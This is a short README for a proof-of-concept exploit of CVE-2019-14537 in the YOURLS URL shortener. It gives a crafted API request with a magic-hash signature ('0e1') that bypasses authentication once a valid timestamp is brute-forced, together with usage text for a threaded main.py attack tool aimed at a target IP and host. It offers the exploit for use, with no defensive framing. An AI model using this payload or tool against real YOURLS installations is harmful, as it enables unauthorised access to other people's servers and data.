CVE-2019-14537 PoC# YOURLS: CVE-2019-14537 PoC

When you get a valid timestamp you will be able to make requests to the api.
http://domain.com/yourls-api.php?signature=0e1&action=db-stats×tamp=VALID_TIMESTAMP
## Usage
```
usage: main.py [-h] [--vhost VHOST] [--threads THREADS] [--path PATH]
[--port PORT]
[ip]
CVE-2019-14537 PoC
positional arguments:
ip Yourls IP
optional arguments:
-h, --help show this help message and exit
--vhost VHOST host name (domain name)
--threads THREADS number of threads (default: 10)
--path PATH yourls-api.php path (default: /yourls-api.php)
--port PORT port (default: 80)
```
[4.0K] /data/pocs/e275e01bc79987274a908c6e4cc62fca4dc7c39f
├── [2.5K] main.py
├── [314K] poc_preview.png
└── [ 785] README.md
0 directories, 3 files